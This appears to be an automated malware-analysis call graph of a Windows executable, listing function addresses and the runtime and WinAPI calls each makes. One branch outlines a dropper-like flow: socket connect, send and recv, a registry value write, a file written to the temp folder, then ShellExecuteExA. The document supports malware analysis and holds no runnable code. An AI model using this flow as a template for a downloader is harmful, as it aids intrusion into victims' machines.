2 library calls 44682->44700 44685->44645 44687 41e987 44686->44687 44688 41e99c 44686->44688 44701 41236e 20 API calls __dosmaperr 44687->44701 44694 41e9c1 44688->44694 44703 41236e 20 API calls __dosmaperr 44688->44703 44691 41e98c 44702 412381 20 API calls __dosmaperr 44691->44702 44692 41e9cc 44704 412381 20 API calls __dosmaperr 44692->44704 44694->44679 44696 41e994 44696->44679 44697 41e9d4 44705 410905 26 API calls _Deallocate 44697->44705 44699->44685 44700->44685 44701->44691 44702->44696 44703->44692 44704->44697 44705->44696 44706->44558 44708 40e1d4 44707->44708 44709 40e1bf 44707->44709 44711 40dfcb _Xfiopen 62 API calls 44708->44711 44713 40e1cf _Xfiopen 44708->44713 44745 412381 20 API calls __dosmaperr 44709->44745 44714 40e1e8 44711->44714 44712 40e1c4 44746 410905 26 API calls _Deallocate 44712->44746 44713->44561 44726 4165f6 44714->44726 44718 4154e8 _Xfiopen 26 API calls 44719 40e1f6 44718->44719 44730 41637e 44719->44730 44722 41629a _free 20 API calls 44722->44713 44723->44557 44724->44563 44725->44563 44727 40e1f0 44726->44727 44728 41660c 44726->44728 44727->44718 44728->44727 44729 41629a _free 20 API calls 44728->44729 44729->44727 44731 4163a2 44730->44731 44732 41638d 44730->44732 44734 4163dd 44731->44734 44738 4163c9 44731->44738 44750 41236e 20 API calls __dosmaperr 44732->44750 44752 41236e 20 API calls __dosmaperr 44734->44752 44735 416392 44751 412381 20 API calls __dosmaperr 44735->44751 44747 416356 44738->44747 44739 4163e2 44753 412381 20 API calls __dosmaperr 44739->44753 44742 40e1fc 44742->44713 44742->44722 44743 4163ea 44754 410905 26 API calls _Deallocate 44743->44754 44745->44712 44746->44713 44755 4162d4 44747->44755 44749 41637a 44749->44742 44750->44735 44751->44742 44752->44739 44753->44743 44754->44742 44756 4162e0 CallCatchBlock 44755->44756 44766 41e6fd EnterCriticalSection 44756->44766 44758 4162ee 44759 416320 44758->44759 44760 416315 44758->44760 44782 412381 20 API calls __dosmaperr 44759->44782 44767 4163fd 44760->44767 44763 41631b 44783 41634a LeaveCriticalSection __wsopen_s 44763->44783 44765 41633d std::_Locinfo::_Locinfo_dtor 44765->44749 44766->44758 44768 41e97a __wsopen_s 26 API calls 44767->44768 44770 41640d 44768->44770 44769 416413 44784 41e8e9 21 API calls 3 library calls 44769->44784 44770->44769 44773 41e97a __wsopen_s 26 API calls 44770->44773 44781 416445 44770->44781 44772 41646b 44775 41648d 44772->44775 44785 41234b 20 API calls 2 library calls 44772->44785 44776 41643c 44773->44776 44774 41e97a __wsopen_s 26 API calls 44777 416451 FindCloseChangeNotification 44774->44777 44775->44763 44779 41e97a __wsopen_s 26 API calls 44776->44779 44777->44769 44780 41645d GetLastError 44777->44780 44779->44781 44780->44769 44781->44769 44781->44774 44782->44763 44783->44765 44784->44772 44785->44775 44786 416ec2 44787 416ecf 44786->44787 44790 416ee7 44786->44790 44836 412381 20 API calls __dosmaperr 44787->44836 44789 416ed4 44837 410905 26 API calls _Deallocate 44789->44837 44792 416f42 44790->44792 44800 416edf 44790->44800 44838 418c55 21 API calls 2 library calls 44790->44838 44794 4154e8 _Xfiopen 26 API calls 44792->44794 44795 416f5a 44794->44795 44806 41919a 44795->44806 44797 416f61 44798 4154e8 _Xfiopen 26 API calls 44797->44798 44797->44800 44799 416f8d 44798->44799 44799->44800 44801 4154e8 _Xfiopen 26 API calls 44799->44801 44802 416f9b 44801->44802 44802->44800 44803 4154e8 _Xfiopen 26 API calls 44802->44803 44804 416fab 44803->44804 44805 4154e8 _Xfiopen 26 API calls 44804->44805 44805->44800 44807 4191a6 CallCatchBlock 44806->44807 44808 4191c6 44807->44808 44809 4191ae 44807->44809 44810 41928c 44808->44810 44814 4191ff 44808->44814 44905 41236e 20 API calls __dosmaperr 44809->44905 44912 41236e 20 API calls __dosmaperr 44810->44912 44813 4191b3 44906 412381 20 API calls __dosmaperr 44813->44906 44817 419223 44814->44817 44818 41920e 44814->44818 44815 419291 44913 412381 20 API calls __dosmaperr 44815->44913 44839 41e6fd EnterCriticalSection 44817->44839 44907 41236e 20 API calls __dosmaperr 44818->44907 44822 41921b 44914 410905 26 API calls _Deallocate 44822->44914 44823 419213 44908 412381 20 API calls __dosmaperr 44823->44908 44824 419229 44827 419245 44824->44827 44828 41925a 44824->44828 44825 4191bb std::_Locinfo::_Locinfo_dtor 44825->44797 44909 412381 20 API calls __dosmaperr 44827->44909 44840 4192ad 44828->44840 44832 419255 44911 419284 LeaveCriticalSection __wsopen_s 44832->44911 44833 41924a 44910 41236e 20 API calls __dosmaperr 44833->44910 44836->44789 44837->44800 44838->44792 44839->44824 44841 4192d7 44840->44841 44842 4192bf 44840->44842 44844 419641 44841->44844 44849 41931c 44841->44849 44924 41236e 20 API calls __dosmaperr 44842->44924 44945 41236e 20 API calls __dosmaperr 44844->44945 44845 4192c4 44925 412381 20 API calls __dosmaperr 44845->44925 44848 419646 44946 412381 20 API calls __dosmaperr 44848->44946 44850 4192cc 44849->44850 44852 419327 44849->44852 44857 419357 44849->44857 44850->44832 44926 41236e 20 API calls __dosmaperr 44852->44926 44854 419334 44947 410905 26 API calls _Deallocate 44854->44947 44855 41932c 44927 412381 20 API calls __dosmaperr 44855->44927 44859 419370 44857->44859 44860 4193b2 44857->44860 44861 419396 44857->44861 44859->44861 44893 41937d 44859->44893 44931 417a45 44860->44931 44928 41236e 20 API calls __dosmaperr 44861->44928 44864 41939b 44929 412381 20 API calls __dosmaperr 44864->44929 44868 41951b 44871 419591 44868->44871 44874 419534 GetConsoleMode 44868->44874 44869 4193a2 44930 410905 26 API calls _Deallocate 44869->44930 44870 41629a _free 20 API calls 44873 4193d2 44870->44873 44876 419595 ReadFile 44871->44876 44875 41629a _free 20 API calls 44873->44875 44874->44871 44879 419545 44874->44879 44880 4193d9 44875->44880 44877 419609 GetLastError 44876->44877 44878 4195af 44876->44878 44881 419616 44877->44881 44882 41956d 44877->44882 44878->44877 44883 419586 44878->44883 44879->44876 44884 41954b ReadConsoleW 44879->44884 44885 4193e3 44880->44885 44886 4193fe 44880->44886 44943 412381 20 API calls __dosmaperr 44881->44943 44902 4193ad __fread_nolock 44882->44902 44940 41234b 20 API calls 2 library calls 44882->44940 44897 4195d4 44883->44897 44898 4195eb 44883->44898 44883->44902 44884->44883 44889 419567 GetLastError 44884->44889 44938 412381 20 API calls __dosmaperr 44885->44938 44888 419800 _Xfiopen 28 API calls 44886->44888 44888->44893 44889->44882 44890 41629a _free 20 API calls 44890->44850 44892 41961b 44944 41236e 20 API calls __dosmaperr 44892->44944 44915 421229 44893->44915 44895 4193e8 44939 41236e 20 API calls __dosmaperr 44895->44939 44941 418fc9 31 API calls 4 library calls 44897->44941 44901 419602 44898->44901 44898->44902 44942 418e09 29 API calls _Xfiopen 44901->44942 44902->44890 44904 419607 44904->44902 44905->44813 44906->44825 44907->44823 44908->44822 44909->44833 44910->44832 44911->44825 44912->44815 44913->44822 44914->44825 44916 421243 44915->44916 44917 421236 44915->44917 44921 42124f 44916->44921 44949 412381 20 API calls __dosmaperr 44916->44949 44948 412381 20 API calls __dosmaperr 44917->44948 44920 42123b 44920->44868 44921->44868 44922 421270 44950 410905 26 API calls _Deallocate 44922->44950 44924->44845 44925->44850 44926->44855 44927->44854 44928->44864 44929->44869 44930->44902 44932 417a83 44931->44932 44933 417a53 IsInExceptionSpec 44931->44933 44952 412381 20 API calls __dosmaperr 44932->44952 44933->44932 44934 417a6e RtlAllocateHeap 44933->44934 44951 412ede 7 API calls 2 library calls 44933->44951 44934->44933 44936 417a81 44934->44936 44936->44870 44938->44895 44939->44902 44940->44902 44941->44902 44942->44904 44943->44892 44944->44902 44945->44848 44946->44854 44947->44850 44948->44920 44949->44922 44950->44920 44951->44933 44952->44936 44953 409385 44954 409391 CallCatchBlock 44953->44954 44985 40959e 44954->44985 44956 409398 44957 4094eb 44956->44957 44960 4093c2 44956->44960 45086 409a73 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 44957->45086 44959 4094f2 45077 413b51 44959->45077 44969 409401 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 44960->44969 45080 413876 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 44960->45080 44965 4093db 44967 4093e1 44965->44967 45081 41381a 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 44965->45081 44975 409462 44969->44975 45082 40e677 39 API calls 5 library calls 44969->45082 44996 409b8d 44975->44996 44986 4095a7 44985->44986 45088 409d1b IsProcessorFeaturePresent 44986->45088 44988 4095b3 45089 40c907 10 API calls 3 library calls 44988->45089 44990 4095b8 44995 4095bc 44990->44995 45090 415329 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 44990->45090 44992 4095c5 44993 4095d3 44992->44993 45091 40c930 8 API calls 3 library calls 44992->45091 44993->44956 44995->44956 45092 40b5a0 44996->45092 44999 409468 45000 4137c7 44999->45000 45094 41e1c1 45000->45094 45002 409471 45005 424b3e 45002->45005 45003 4137d0 45003->45002 45098 41e4cb 38 API calls 45003->45098 45006 424b4e _Xfiopen 45005->45006 45100 401b1e 45006->45100 45008 424b7c 45103 403498 45008->45103 45013 401b1e 27 API calls 45014 424bdc 45013->45014 45110 426354 45014->45110 45017 401b1e 27 API calls 45018 424bf5 GetModuleFileNameA 45017->45018 45019 401b1e 27 API calls 45018->45019 45020 424c1f 45019->45020 45130 425ee2 45020->45130 45022 424c2f 45023 401b1e 27 API calls 45022->45023 45024 4250ca 45023->45024 45149 4034e3 45024->45149 45026 4250f4 45157 426504 45026->45157 45028 425233 45220 42612f 45028->45220 45030 4253f6 45031 401b1e 27 API calls 45030->45031 45032 4255c2 45031->45032 45234 40356f 45032->45234 45034 4255df 45035 426504 63 API calls 45034->45035 45036 425666 45035->45036 45037 426504 63 API calls 45036->45037 45040 425840 ___scrt_fastfail 45037->45040 45038 425e40 45263 4019f8 26 API calls 45038->45263 45040->45038 45242 410c91 45040->45242 45045 42586d 45250 426217 CreateFileA 45045->45250 45049 401b1e 27 API calls 45050 4258a7 45049->45050 45253 426260 45050->45253 45053 4258ac 45054 426504 63 API calls 45053->45054 45055 425ac4 ___scrt_fastfail 45054->45055 45063 425bbf 45055->45063 45260 42631a GetTempPathA 45055->45260 45058 426217 3 API calls 45059 425ba3 45058->45059 45060 401b1e 27 API calls 45059->45060 45059->45063 45061 425bba 45060->45061 45062 426260 29 API calls 45061->45062 45062->45063 45064 426504 63 API calls 45063->45064 45066 425db5 ___scrt_fastfail 45064->45066 45068 410c91 51 API calls 45066->45068 45073 425e1b 45066->45073 45070 425ddf 45068->45070 45071 426217 3 API calls 45070->45071 45072 425dfd 45071->45072 45072->45073 45074 401b1e 27 API calls 45072->45074 45262 4019f8 26 API calls 45073->45262 45075 425e16 45074->45075 45076 426260 29 API calls 45075->45076 45076->45073 45714 4138ce 45077->45714 45080->44965 45081->44969 45082->44975 45086->44959 45088->44988 45089->44990 45090->44992 45091->44995 45093 409ba0 GetStartupInfoW 45092->45093 45093->44999 45095 41e1ca 45094->45095 45096 41e1d3 45094->45096 45099 41e0c0 51 API calls 5 library calls 45095->45099 45096->45003 45098->45003 45099->45096 45264 402c50 45100->45264 45104 4034c0 45103->45104 45105 4034d9 45103->45105 45104->45105 45273 40e509 46 API calls 45104->45273 45107 401b52 45105->45107 45274 402d13 45107->45274 45109 401b68 45109->45013 45111 42635e __EH_prolog 45110->45111 45305 403e0c 45111->45305 45113 426382 45113->45113 45114 402c71 27 API calls 45113->45114 45115 4263e7 45114->45115 45319 404097 45115->45319 45117 426496 45121 4264b2 std::ios_base::_Ios_base_dtor 45117->45121 45336 40387f 26 API calls 2 library calls 45117->45336 45120 42646e 45124 402c50 27 API calls 45120->45124 45332 402bef 45121->45332 45122 402c71 27 API calls 45122->45120 45126 42648e 45124->45126 45127 402bef 26 API calls 45126->45127 45127->45117 45128 402bef 26 API calls 45129 424be8 45128->45129 45129->45017 45131 425eec __EH_prolog 45130->45131 45466 401bb2 45131->45466 45136 425f4b 45482 401a16 45136->45482 45137 425f2f 45503 401b6f 45137->45503 45140 425f58 45485 4024a1 45140->45485 45146 425fa6 45147 401b6f 68 API calls 45146->45147 45148 425f42 std::ios_base::_Ios_base_dtor 45147->45148 45148->45022 45150 4034ed __EH_prolog 45149->45150 45654 401056 45150->45654 45152 403513 45153 401056 50 API calls 45152->45153 45154 403542 45153->45154 45658 40399f 45154->45658 45156 403553 45156->45026 45158 42650e __EH_prolog 45157->45158 45159 401b1e 27 API calls 45158->45159 45160 4268d7 45159->45160 45696 401aa1 45160->45696 45162 4268ed 45163 401aa1 27 API calls 45162->45163 45164 426974 45163->45164 45165 401aa1 27 API calls 45164->45165 45166 426981 45165->45166 45167 401aa1 27 API calls 45166->45167 45168 4269e4 45167->45168 45169 401aa1 27 API calls 45168->45169 45170 4269f5 45169->45170 45171 401aa1 27 API calls 45170->45171 45172 426a02 45171->45172 45173 401aa1 27 API calls 45172->45173 45174 426aad 45173->45174 45175 401aa1 27 API calls 45174->45175 45176 426da4 45175->45176 45177 401aa1 27 API calls 45176->45177 45178 427053 45177->45178 45179 401aa1 27 API calls 45178->45179 45205 427060 45179->45205 45180 42717c 45181 401aa1 27 API calls 45180->45181 45182 427189 WSAStartup 45181->45182 45183 4271a3 socket 45182->45183 45206 4273da 45182->45206 45184 4271d0 45183->45184 45185 4271bb 45183->45185 45187 4271d8 gethostbyname 45184->45187 45186 4271c4 WSACleanup 45185->45186 45188 42758b 45186->45188 45189 4271e9 ctype 45187->45189 45187->45206 45188->45028 45191 4271fc htons connect 45189->45191 45190 42757e WSACleanup closesocket 45190->45188 45192 42722b 45191->45192 45191->45206 45193 42723d send 45192->45193 45194 42724d 45193->45194 45193->45206 45195 427253 send 45194->45195 45201 427269 ___scrt_fastfail 45194->45201 45195->45201 45195->45206 45196 42728f recv 45196->45201 45196->45206 45197 412faf 46 API calls 45197->45201 45198 4273cd 45199 4273d4 45198->45199 45200 427515 45198->45200 45218 4273e9 45198->45218 45199->45206 45199->45218 45202 427535 recv 45200->45202 45200->45206 45201->45196 45201->45197 45201->45198 45201->45206 45702 41196d 42 API calls std::_Locinfo::_Locinfo_dtor 45201->45702 45202->45200 45202->45206 45203 42740d recv 45203->45206 45203->45218 45205->45180 45207 401aa1 27 API calls 45205->45207 45206->45190 45209 42714c 45207->45209 45208 427508 45208->45206 45700 403ae1 27 API calls 45209->45700 45212 427157 45701 401ac2 27 API calls 45212->45701 45214 427164 45217 401aa1 27 API calls 45214->45217 45216 4274aa recv 45216->45206 45216->45218 45217->45180 45218->45203 45218->45206 45218->45208 45218->45216 45219 4274d5 recv 45218->45219 45703 41196d 42 API calls std::_Locinfo::_Locinfo_dtor 45218->45703 45704 42611d 22 API calls 45218->45704 45219->45206 45219->45218 45710 4275a4 45220->45710 45222 426139 RegCreateKeyExA 45223 4261f7 45222->45223 45224 42616c 45222->45224 45225 426206 45223->45225 45226 4261fd RegCloseKey 45223->45226 45227 402c71 27 API calls 45224->45227 45225->45030 45226->45225 45228 426195 45227->45228 45229 402c71 27 API calls 45228->45229 45230 4261be RegSetValueExA 45229->45230 45231 402bef 26 API calls 45230->45231 45232 4261ef 45231->45232 45233 402bef 26 API calls 45232->45233 45233->45223 45235 403579 __EH_prolog 45234->45235 45236 401056 50 API calls 45235->45236 45237 40359c 45236->45237 45238 401056 50 API calls 45237->45238 45239 4035c8 45238->45239 45240 40399f 27 API calls 45239->45240 45241 4035d9 45240->45241 45241->45034 45243 410cb2 45242->45243 45244 410c9d 45242->45244 45713 41097b 51 API calls 5 library calls 45243->45713 45711 412381 20 API calls __dosmaperr 45244->45711 45247 410cad 45247->45045 45248 410ca2 45712 410905 26 API calls _Deallocate 45248->45712 45251 42588e 45250->45251 45252 42623e WriteFile FindCloseChangeNotification 45250->45252 45251->45049 45251->45053 45252->45251 45254 426271 45253->45254 45254->45254 45255 426279 ShellExecuteExA 45254->45255 45256 4262c5 45255->45256 45257 4262ae WaitForSingleObject CloseHandle 45255->45257 45258 402bef 26 API calls 45256->45258 45257->45256 45259 4262cd 45258->45259 45259->45053 45261 425b8e 45260->45261 45261->45058 45265 402c5a 45264->45265 45265->45265 45268 402c71 45265->45268 45267 401b3a 45267->45008 45269 402ca4 45268->45269 45271 402c80 BuildCatchObjectHelperInternal 45268->45271 45272 40373e 27 API calls 2 library calls 45269->45272 45271->45267 45272->45271 45273->45104 45275 402d2a 45274->45275 45277 402d31 ctype 45275->45277 45278 403859 45275->45278 45277->45109 45279 403866 45278->45279 45280 40386f 45278->45280 45285 4039ce 45279->45285 45282 40387b 45280->45282 45294 409256 45280->45294 45282->45277 45283 40386c 45283->45277 45286 409256 std::_Facet_Register 8 API calls 45285->45286 45287 4039e5 45286->45287 45288 4039f7 45287->45288 45289 4039ec 45287->45289 45301 41088a 26 API calls 3 library calls 45288->45301 45289->45283 45291 410924 45302 410932 11 API calls _abort 45291->45302 45293 410931 45296 40925b ___crtCompareStringA 45294->45296 45295 409275 45295->45283 45296->45295 45298 409277 std::_Facet_Register 45296->45298 45303 412ede 7 API calls 2 library calls 45296->45303 45304 40aa2b RaiseException 45298->45304 45300 40996c 45301->45291 45302->45293 45303->45296 45304->45300 45306 403e16 __EH_prolog 45305->45306 45337 407d73 45306->45337 45308 403e38 45347 404189 45308->45347 45314 403e7f 45385 4044e5 45314->45385 45316 403e8b 45406 4043fe 45316->45406 45320 4040a1 __EH_prolog 45319->45320 45325 4040b2 45320->45325 45459 40429b 27 API calls __EH_prolog 45320->45459 45322 4040d9 45460 404777 27 API calls 45322->45460 45325->45117 45325->45120 45325->45122 45327 404144 45463 404777 27 API calls 45327->45463 45328 4040e9 45328->45327 45331 404152 45328->45331 45461 404777 27 API calls 45328->45461 45462 404579 26 API calls 45328->45462 45464 404238 26 API calls _Deallocate 45331->45464 45333 402c03 45332->45333 45334 402bfa 45332->45334 45333->45128 45465 40387f 26 API calls 2 library calls 45334->45465 45336->45121 45338 407d7f __EH_prolog3 45337->45338 45410 407b1c 45338->45410 45343 407d9d 45424 407f02 40 API calls _Atexit 45343->45424 45344 407dfb std::locale::_Init 45344->45308 45346 407da5 _Yarn 45416 407b74 45346->45416 45348 404193 __EH_prolog 45347->45348 45349 407b1c std::_Lockit::_Lockit 2 API calls 45348->45349 45350 4041a2 45349->45350 45429 401318 45350->45429 45352 4041b9 std::locale::_Getfacet 45360 4041cc 45352->45360 45435 40436e 76 API calls 3 library calls 45352->45435 45353 407b74 std::_Lockit::~_Lockit 2 API calls 45354 403e49 45353->45354 45363 4033ea 45354->45363 45356 4041dc 45357 4041e3 45356->45357 45358 404219 45356->45358 45436 407d41 8 API calls std::_Facet_Register 45357->45436 45437 40aa2b RaiseException 45358->45437 45360->45353 45362 40422f 45364 4033f4 __EH_prolog 45363->45364 45365 407b1c std::_Lockit::_Lockit 2 API calls 45364->45365 45366 403403 45365->45366 45367 401318 int 4 API calls 45366->45367 45369 40341a std::locale::_Getfacet 45367->45369 45368 40342d 45370 407b74 std::_Lockit::~_Lockit 2 API calls 45368->45370 45369->45368 45438 401429 76 API calls 2 library calls 45369->45438 45372 40346a 45370->45372 45379 404424 45372->45379 45373 40343d 45374 403444 45373->45374 45375 40347a 45373->45375 45439 407d41 8 API calls std::_Facet_Register 45374->45439 45440 40aa2b RaiseException 45375->45440 45378 403490 45380 40442e __EH_prolog 45379->45380 45441 404d6b 45380->45441 45382 404463 45383 409256 std::_Facet_Register 8 API calls 45382->45383 45384 40447e 45383->45384 45384->45314 45386 4044ef __EH_prolog 45385->45386 45453 405177 8 API calls std::_Facet_Register 45386->45453 45388 40450d 45454 405025 29 API calls std::_Facet_Register 45388->45454 45390 404517 45391 404571 45390->45391 45392 40451e 45390->45392 45457 404efe 27 API calls 45391->45457 45455 405119 8 API calls std::_Facet_Register 45392->45455 45395 404528 45456 405e85 8 API calls std::_Facet_Register 45395->45456 45397 404531 45397->45316 45407 403eb8 45406->45407 45408 404406 45406->45408 45407->45113 45458 40387f 26 API calls 2 library calls 45408->45458 45411 407b32 45410->45411 45412 407b2b 45410->45412 45414 407b30 45411->45414 45426 408745 EnterCriticalSection 45411->45426 45425 411a65 EnterCriticalSection _abort 45412->45425 45414->45346 45423 407edf 8 API calls 2 library calls 45414->45423 45417 407b7e 45416->45417 45418 411a6e 45416->45418 45422 407b91 45417->45422 45427 408753 LeaveCriticalSection 45417->45427 45428 411a4e LeaveCriticalSection 45418->45428 45421 411a75 45421->45344 45422->45344 45423->45343 45424->45346 45425->45414 45426->45414 45427->45422 45428->45421 45430 401324 45429->45430 45431 401348 45429->45431 45432 407b1c std::_Lockit::_Lockit 2 API calls 45430->45432 45431->45352 45433 40132e 45432->45433 45434 407b74 std::_Lockit::~_Lockit 2 API calls 45433->45434 45434->45431 45435->45356 45436->45360 45437->45362 45438->45373 45439->45368 45440->45378 45444 404eb6 45441->45444 45443 404d85 45443->45382 45443->45443 45445 404ed2 45444->45445 45450 404ece 45444->45450 45446 404ef8 45445->45446 45447 404eda 45445->45447 45452 4030f6 27 API calls 45446->45452 45448 403859 27 API calls 45447->45448 45448->45450 45450->45443 45453->45388 45454->45390 45455->45395 45456->45397 45458->45407 45459->45322 45460->45328 45461->45328 45462->45328 45463->45331 45465->45333 45467 401bbc __EH_prolog 45466->45467 45507 40307c 45467->45507 45473 401c1f 45474 401c51 45473->45474 45525 40187f 43 API calls 2 library calls 45473->45525 45476 402403 45474->45476 45477 40240d __EH_prolog 45476->45477 45543 402b06 45477->45543 45480 402441 45480->45136 45480->45137 45589 402baa 45482->45589 45484 401a30 ___scrt_fastfail 45484->45140 45486 4024ab __EH_prolog 45485->45486 45487 4024e4 45486->45487 45598 40187f 43 API calls 2 library calls 45486->45598 45489 402b06 43 API calls 45487->45489 45490 4024ee 45489->45490 45491 402551 45490->45491 45494 401d87 65 API calls 45490->45494 45495 40257c 45491->45495 45492 402511 45492->45491 45599 40187f 43 API calls 2 library calls 45492->45599 45494->45492 45496 402586 __EH_prolog 45495->45496 45497 402b06 43 API calls 45496->45497 45500 4025a8 45497->45500 45498 40265a 45506 402b87 26 API calls _Deallocate 45498->45506 45501 4025d8 45500->45501 45600 401f2b 45500->45600 45501->45498 45604 40187f 43 API calls 2 library calls 45501->45604 45642 4023b6 45503->45642 45505 401b95 45505->45148 45506->45146 45508 403086 __EH_prolog 45507->45508 45526 403175 45508->45526 45511 402fe5 45512 402fef __EH_prolog 45511->45512 45513 409256 std::_Facet_Register 8 API calls 45512->45513 45514 403005 45513->45514 45515 407d73 std::locale::_Init 43 API calls 45514->45515 45516 403013 45515->45516 45537 402e7b 45516->45537 45519 402f6b 45520 402f75 __EH_prolog 45519->45520 45521 402e7b 26 API calls 45520->45521 45524 402fbf std::ios_base::_Ios_base_dtor 45520->45524 45522 402f9d 45521->45522 45542 4035f5 76 API calls 7 library calls 45522->45542 45524->45473 45525->45474 45527 40317f __EH_prolog 45526->45527 45528 409256 std::_Facet_Register 8 API calls 45527->45528 45529 4031b9 45528->45529 45530 407d73 std::locale::_Init 43 API calls 45529->45530 45531 4031c6 45530->45531 45532 4033ea 76 API calls 45531->45532 45533 4031f5 std::ios_base::_Ios_base_dtor 45532->45533 45534 401bec 45533->45534 45536 40187f 43 API calls 2 library calls 45533->45536 45534->45511 45536->45534 45538 401c0f 45537->45538 45539 402ed9 45537->45539 45538->45519 45541 40e7d7 26 API calls 2 library calls 45539->45541 45541->45538 45542->45524 45544 402b10 __EH_prolog 45543->45544 45555 403101 45544->45555 45547 401d87 45548 401d99 45547->45548 45554 401df4 45548->45554 45563 402dfd 45548->45563 45551 401de1 45551->45554 45572 40fd67 45551->45572 45554->45480 45556 40310b __EH_prolog 45555->45556 45557 403128 45556->45557 45561 403242 43 API calls __EH_prolog 45556->45561 45558 40241d 45557->45558 45562 40187f 43 API calls 2 library calls 45557->45562 45558->45480 45558->45547 45561->45557 45562->45558 45564 402e0d 45563->45564 45568 401dc4 45563->45568 45564->45568 45583 4022ae 65 API calls 45564->45583 45566 402e1a 45566->45568 45584 40ea7d 65 API calls 2 library calls 45566->45584 45568->45551 45568->45554 45569 4106d4 45568->45569 45570 41049b _Xfiopen 64 API calls 45569->45570 45571 4106ea 45570->45571 45571->45551 45573 40fd72 45572->45573 45575 40fd87 45572->45575 45585 412381 20 API calls __dosmaperr 45573->45585 45582 40fd9f 45575->45582 45587 412381 20 API calls __dosmaperr 45575->45587 45576 40fd77 45586 410905 26 API calls _Deallocate 45576->45586 45579 40fd94 45588 410905 26 API calls _Deallocate 45579->45588 45580 40fd82 45580->45554 45582->45554 45583->45566 45584->45568 45585->45576 45586->45580 45587->45579 45588->45582 45590 402bc6 45589->45590 45591 402bc2 45589->45591 45592 402be9 45590->45592 45593 402bce 45590->45593 45591->45484 45597 4030f6 27 API calls 45592->45597 45595 403859 27 API calls 45593->45595 45595->45591 45598->45487 45599->45491 45601 401f3f 45600->45601 45602 401f52 ctype 45600->45602 45601->45501 45602->45601 45605 4102e9 45602->45605 45604->45498 45608 410306 45605->45608 45607 410301 45607->45601 45609 410312 CallCatchBlock 45608->45609 45610 410352 45609->45610 45611 41034a std::_Locinfo::_Locinfo_dtor 45609->45611 45615 410325 ___scrt_fastfail 45609->45615 45621 40e81d EnterCriticalSection 45610->45621 45611->45607 45614 41035c 45622 41011d 45614->45622 45635 412381 20 API calls __dosmaperr 45615->45635 45616 41033f 45636 410905 26 API calls _Deallocate 45616->45636 45621->45614 45625 41012f ___scrt_fastfail 45622->45625 45628 41014c 45622->45628 45623 41013c 45638 412381 20 API calls __dosmaperr 45623->45638 45625->45623 45625->45628 45630 41018f __fread_nolock 45625->45630 45626 410141 45639 410905 26 API calls _Deallocate 45626->45639 45637 410391 LeaveCriticalSection _Xfiopen 45628->45637 45629 4102ab ___scrt_fastfail 45641 412381 20 API calls __dosmaperr 45629->45641 45630->45628 45630->45629 45632 4154e8 _Xfiopen 26 API calls 45630->45632 45634 4192ad __fread_nolock 38 API calls 45630->45634 45640 410399 26 API calls 4 library calls 45630->45640 45632->45630 45634->45630 45635->45616 45636->45611 45637->45611 45638->45626 45639->45628 45640->45630 45641->45626 45643 4023dd 45642->45643 45644 4023ef 45643->45644 45646 402f2f 45643->45646 45644->45505 45647 402f39 45646->45647 45648 402f3d 45646->45648 45651 402e7b 26 API calls 45647->45651 45649 402dfd 65 API calls 45648->45649 45650 402f42 45649->45650 45652 40e228 _Xfiopen 67 API calls 45650->45652 45653 402f66 45651->45653 45652->45647 45653->45644 45655 40106d ___scrt_initialize_default_local_stdio_options 45654->45655 45662 40fd43 45655->45662 45659 4039c7 45658->45659 45660 4039bb 45658->45660 45659->45156 45661 402c71 27 API calls 45660->45661 45661->45659 45665 40ead5 45662->45665 45666 40eb15 45665->45666 45667 40eafd 45665->45667 45666->45667 45669 40eb1d 45666->45669 45689 412381 20 API calls __dosmaperr 45667->45689 45691 40e3f2 38 API calls 2 library calls 45669->45691 45670 40eb02 45690 410905 26 API calls _Deallocate 45670->45690 45673 40eb2d 45692 40eef9 20 API calls __Strcoll 45673->45692 45676 40eba5 45693 40f0ad 50 API calls 3 library calls 45676->45693 45677 40107b 45677->45152 45680 40eb0d 45682 4097a5 45680->45682 45681 40ebb0 45694 40ef2e 20 API calls _free 45681->45694 45683 4097b0 IsProcessorFeaturePresent 45682->45683 45684 4097ae 45682->45684 45686 409efa 45683->45686 45684->45677 45695 409ebe SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45686->45695 45688 409fdd 45688->45677 45689->45670 45690->45680 45691->45673 45692->45676 45693->45681 45694->45680 45695->45688 45697 401aab 45696->45697 45697->45697 45705 402cba 45697->45705 45699 401abd 45699->45162 45700->45212 45701->45214 45702->45201 45703->45218 45704->45218 45706 402cfa 45705->45706 45708 402cd0 BuildCatchObjectHelperInternal 45705->45708 45709 4037a9 27 API calls 2 library calls 45706->45709 45708->45699 45709->45708 45710->45222 45711->45248 45712->45247 45713->45247 45715 4138da _abort 45714->45715 45716 4138e1 45715->45716 45717 4138f3 45715->45717 45750 413a28 GetModuleHandleW 45716->45750 45738 411a06 EnterCriticalSection 45717->45738 45720 4138e6 45720->45717 45751 413a6c GetModuleHandleExW 45720->45751 45721 413998 45739 4139d8 45721->45739 45725 41396f 45727 413987 45725->45727 45760 41381a 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 45725->45760 45761 41381a 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 45727->45761 45728 4138fa 45728->45721 45728->45725 45759 4151ba 20 API calls _abort 45728->45759 45729 4139e1 45762 424699 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 45729->45762 45730 4139b5 45742 4139e7 45730->45742 45738->45728 45763 411a4e LeaveCriticalSection 45739->45763 45741 4139b1 45741->45729 45741->45730 45764 4177fa 45742->45764 45745 413a15 45748 413a6c _abort 8 API calls 45745->45748 45746 4139f5 GetPEB 45746->45745 45747 413a05 GetCurrentProcess TerminateProcess 45746->45747 45747->45745 45749 413a1d ExitProcess 45748->45749 45750->45720 45752 413a96 GetProcAddress 45751->45752 45753 413ab9 45751->45753 45754 413aab 45752->45754 45755 413ac8 45753->45755 45756 413abf FreeLibrary 45753->45756 45754->45753 45757 4097a5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 45755->45757 45756->45755 45758 4138f2 45757->45758 45758->45717 45759->45725 45760->45727 45761->45721 45763->45741 45765 417815 45764->45765 45766 41781f 45764->45766 45768 4097a5 